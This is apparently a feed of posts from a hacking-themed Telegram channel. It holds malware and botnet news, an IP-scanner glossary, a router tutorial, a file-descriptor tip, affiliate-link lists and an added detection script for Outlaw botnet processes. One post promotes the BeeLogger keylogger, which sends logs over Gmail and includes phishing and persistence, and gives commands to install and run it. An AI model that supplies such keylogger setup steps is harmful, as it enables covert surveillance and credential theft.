▁ ▂ ▄ UNDERCODE ▄ ▂ ▁
🦑 Android malware FakeSpy "reappears" after three years, more dangerous than before:
#News
> According to a report by foreign media outlet BGR, an Android malware called FakeSpy has resurfaced; its current main targets are users in the United States and Western Europe. The application can steal user text messages, bank information and application data. The malware is spread via a text message that appears to come from a local post office and instructs users to download an application disguised as a legitimate post office application.
> According to a new report from Cybereason, a dangerous Android malware called FakeSpy has reappeared. FakeSpy was first discovered by security researchers nearly three years ago. It is a particularly malicious piece of malware designed to steal user text messages, financial data, bank login information, application data, contact lists, etc.
> In its initial incarnation, the app targeted users in South Korea and Japan. Recently, however, it has become more ambitious and is now targeting users around the world. Currently, the countries targeted by the malware include China, France, Germany, the United Kingdom and the United States. The current iteration of FakeSpy is also reported to be more powerful and more complex than the original version, which means that Android users should be particularly wary of suspicious messages.
> FakeSpy's way of spreading is quite clever. It starts with a text message claiming to be from a local post office. The message claims that the post office tried to deliver a package but could not, because the user was not at home. It then provides a link that the user can click, which leads the user to download an application disguised as a legitimate postal service application. Once installed on the device, the app sends fake text messages and malicious links to the user's entire contact list.
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ UNDERCODE ▄ ▂ ▁
🦑 Top-rated 2020 paid and free virtual number services, for business only:
1️⃣ Nextiva
https://www.nextiva.com/x20/aff44/?utm_source=CJ&utm_medium=ctable&utm_campaign=CJ&AID=10932738&PID=100126123&cjevent=c3adc3b9bf5e11ea82f102060a18050f
2️⃣ For USA
https://voice.google.com/u/0/signup
(free) & great
3️⃣ Grasshopper
https://grasshopper.com/?clickid=VsRW1MwKexyOTg%3AwUx0Mo3EWUkiUrOVGeUFATg0&irgwc=1&utm_source=Impact&utm_medium=Affiliate&utm_campaign=503375
4️⃣ CallHippo
https://callhippo.com/?fp_ref=smallbizgenius
There are many more, but those are top rated.
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ UNDERCODE ▄ ▂ ▁
For more about free phone numbers (2020), check out https://t.me/UnderCodeTesting/3115
▁ ▂ ▄ UNDERCODE ▄ ▂ ▁
🦑 Random key terms:
> Feeder - the source of IP addresses for scanning. Angry IP Scanner provides various scanning sources: IP Range, IP List File or Random. You can select a source from the drop-down list next to the "Start" button.
> Data collector - collects specific information about the host, for example ping time, host name, open ports. Collectors usually appear as columns in the scan results. They can be selected in the menu "Tools -> Data Collectors".
> Active host - a host that responds to ping. Marked in blue in the results list.
> Inactive host - a host that does not respond to ping (red). However, it may have open ports (if the firewall blocks ping). To fully scan such hosts, check the "Scan inactive" checkbox in Tools -> Preferences.
> Pinging (host check):
> ICMP echo - the standard method used by the 'ping' program. On most platforms it requires administrator privileges. Some firewalls block replies to ICMP requests, making active hosts look inactive.
> UDP - sends UDP packets (datagrams) to one of the host's ports and checks whether there is a response. Not standard, but does not require privileges.
> TCP - tries to connect to port 80 (http). UDP may work better for some networks, but usually not.
> UDP and TCP scanning most often does not detect routers or other network equipment properly.
> Open port - a TCP port that responded to the connection attempt. Shown in green in the list.
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ UNDERCODE ▄ ▂ ▁
Malware Traffic Analysis Exercise (July 2019).pdf
480.6 KB
Malware Traffic Analysis #Exercise
▁ ▂ ▄ UNDERCODE ▄ ▂ ▁
🦑 Top-rated sites for gift cards in 2020:
> https://grindabuck.com/
> https://grny.io/2FAC5BX
> https://www.instagc.com/1697927
> https://www.anrdoezrs.net/click-7068738-13997154/ref/a0sq8i
> https://go.wellkeptwallet.com/surveyjunkienew
> https://wellkeptwallet.com/get-paid-play-games-online/
> https://www.thewaystowealth.com/fetch
> https://www.thewaystowealth.com/ibotta (app)
> https://www.thewaystowealth.com/drop
> https://www.thewaystowealth.com/sba
> https://go.millennialmoney.com/inboxdollars/?pd00=30347&pd02=L2kDatx712dX
Enjoy, guys ❤️
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ UNDERCODE ▄ ▂ ▁
🦑 LINUX-TERMUX BEELOGGER
FEATURES:
> Sends logs every 120 seconds.
> Sends logs when chars > 50.
> Sends logs via Gmail.
> Some phishing methods are included.
> Multiple sessions disabled.
> Auto persistence.
INSTALLATION & RUN:
1️⃣ git clone https://github.com/4w4k3/BeeLogger.git
Running:
2️⃣ cd BeeLogger
3️⃣ sudo su
4️⃣ chmod +x install.sh
5️⃣ ./install.sh
6️⃣ python bee.py
If you have another version of Python:
python2.7 bee.py
7️⃣ Choose options via numbers
Use for learning!
Enjoy ❤️
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ UNDERCODE ▄ ▂ ▁
🦑 Outlaw botnet infects about 20,000 Linux servers; Tencent Security reminds enterprises to remove it in time
#news
> The parent file delivered in this attack is dota3.tar.gz, which may be the third version of the Outlaw botnet. The parent file drops a shell script that starts the corresponding binaries: kswapd0 is responsible for mining Monero, while tsm32 and tsm64 are responsible for continuing the SSH brute-force attack to spread the malware.
> The Outlaw botnet was previously distributed by exploiting the Shellshock vulnerability, so it was named "Shellbot". Shellbot uses common command injection vulnerabilities on Internet of Things (IoT) devices and Linux servers to infect them. The Shellshock vulnerability (CVE-2014-7169) is a serious vulnerability discovered in the Bash command shell in 2014. Most Linux distributions use this shell, and attackers can remotely execute code on affected Linux servers.
> The Outlaw botnet intrudes through SSH brute-force attacks, which can be detected.
> Cloud Firewall can detect the mining behavior of the Outlaw botnet, Shellshock exploitation, brute-force cracking of SSH login passwords and other attack activities.
At present, the impact of the Outlaw botnet is still spreading, causing serious harm to enterprise servers. Tencent security products have taken emergency response measures.
@undercodeNews
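A host-side check built from the file names the post gives (dota3.tar.gz, kswapd0, tsm32, tsm64), as an added example that is not part of the original post or of any Tencent tooling. The `ps` sample and the paths in it are constructed; the only outside fact used is that the real kswapd0 is a kernel thread, a child of kthreadd (PID 2) with no command line.

```python
# Added example: indicator names come from the post; sample lines are constructed.
MINER_NAME = "kswapd0"               # userland miner named after a kernel thread
SPREADER_NAMES = {"tsm32", "tsm64"}  # SSH brute-force components
DROPPER_ARCHIVE = "dota3.tar.gz"     # parent archive

# Constructed `ps -eo pid,ppid,comm,args` output (not real telemetry).
SAMPLE_PS = """\
  PID  PPID COMMAND  COMMAND
    2     0 kthreadd [kthreadd]
   57     2 kswapd0  [kswapd0]
  812     1 sshd     /usr/sbin/sshd -D
 4021     1 kswapd0  /home/demo/.hidden/kswapd0
 4090  4021 tsm64    ./tsm64
 4133  3990 tar      tar xzf dota3.tar.gz
 5200     1 kswapd0  [kswapd0]
"""


def is_kernel_thread(ppid, args):
    """Real kernel threads are children of kthreadd (PID 2); ps prints their
    name in brackets because they have no command line."""
    return ppid == 2 and args.startswith("[") and args.endswith("]")


def scan_ps(text):
    """Return (pid, reason) for every process matching the post's indicators."""
    findings = []
    for line in text.splitlines():
        parts = line.split(None, 3)
        if len(parts) < 4 or not (parts[0].isdigit() and parts[1].isdigit()):
            continue  # header or malformed line
        pid, ppid, comm = int(parts[0]), int(parts[1]), parts[2]
        args = parts[3].strip()
        if comm == MINER_NAME and not is_kernel_thread(ppid, args):
            # Covers both a visible binary path and a spoofed "[kswapd0]" argv.
            findings.append((pid, "fake-kswapd0"))
        elif comm in SPREADER_NAMES:
            findings.append((pid, "ssh-spreader"))
        elif DROPPER_ARCHIVE in args:
            findings.append((pid, "dropper-archive"))
    return findings


if __name__ == "__main__":
    for pid, reason in scan_ps(SAMPLE_PS):
        print(pid, reason)
```

PID 5200 in the sample shows why the parent PID is checked as well as the bracketed name: a process can rewrite its own argv, but it cannot make itself a child of kthreadd.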
▁ ▂ ▄ UNDERCODE ▄ ▂ ▁
🦑 How do you bind internal IPs to a fixed WAN port on a multi-WAN router? LAN IP address settings
How do you make intranet IPs on a multi-WAN router correspond to a fixed WAN port? With several broadband lines available, you may want certain computers to take a preferred route so that they get fast network speed. To do this, we need to set the LAN IP address; the detailed tutorial follows for reference.
> When using multiple broadband lines, to ensure that certain computers have sufficient speed, we can make those computers take a designated route, separate from the other computers. Next, let's see how to send specified LAN IPs out through a specified WAN port of the multi-WAN router.
1️⃣ First, set up an address group and put the IPs that need special handling into it.
2️⃣ Open "Routing Settings" in "Transmission Control".
3️⃣ Go into the "policy PBR list of rules" and click "Add".
4️⃣ In the source address, select the IP address group to be bound to the WAN2 port.
5️⃣ Select "WAN2" as the effective interface so that the traffic goes out through the WAN2 port.
6️⃣ The other settings can keep their defaults; click "OK" to save the settings.
7️⃣ Now you can test whether the traffic goes out through the designated WAN port.
Great! That's all.
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ UNDERCODE ▄ ▂ ▁
🦑 The difference between file descriptors and file pointers:
#fastTips
> File descriptor: Opening a file on a Linux system returns a file descriptor, which is a small positive integer. Each process stores a file descriptor table in its PCB (Process Control Block). The file descriptor is an index into this table, and each entry holds a pointer to the opened file.
> File pointer: The file pointer is the handle used for I/O in the C language. It points to a data structure called the FILE structure in the process's user space. The FILE structure includes a buffer and a file descriptor. The file descriptor is an index into the file descriptor table, so in a sense the file pointer is a handle to a handle (on Windows systems, the file descriptor is called the file handle).
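The same layering seen from Python, as an added example that is not part of the original post: `os.open` returns the raw descriptor, and the object from `os.fdopen` plays the role that C's FILE plays, a user-space buffer wrapped around that descriptor. The scratch file name is constructed.

```python
import os
import tempfile


def fd_vs_stream_demo():
    """Write through a buffered stream and through its raw descriptor,
    recording the file size the kernel sees after each step."""
    with tempfile.TemporaryDirectory() as tmp:
        path = os.path.join(tmp, "demo.txt")  # constructed scratch file
        # Descriptor level: an integer index into this process's descriptor table.
        fd = os.open(path, os.O_WRONLY | os.O_CREAT | os.O_TRUNC, 0o600)
        # Stream level: a user-space buffer wrapped around that descriptor,
        # the layering fdopen() gives a FILE* in C.
        stream = os.fdopen(fd, "w", buffering=4096)
        result = {"same_fd": stream.fileno() == fd}

        stream.write("hello")                 # stays in the user-space buffer
        result["size_before_flush"] = os.fstat(fd).st_size
        stream.flush()                        # buffer handed to the kernel
        result["size_after_flush"] = os.fstat(fd).st_size

        os.write(fd, b" world")               # raw write, no buffer involved
        result["size_after_raw_write"] = os.fstat(fd).st_size

        stream.close()                        # closing the stream closes the fd
        try:
            os.fstat(fd)
            result["fd_closed_with_stream"] = False
        except OSError:
            result["fd_closed_with_stream"] = True
        return result


if __name__ == "__main__":
    print(fd_vs_stream_demo())
```

Data written to the stream is invisible to anything reading the file until the flush, and closing the stream invalidates the descriptor for any code still holding the integer.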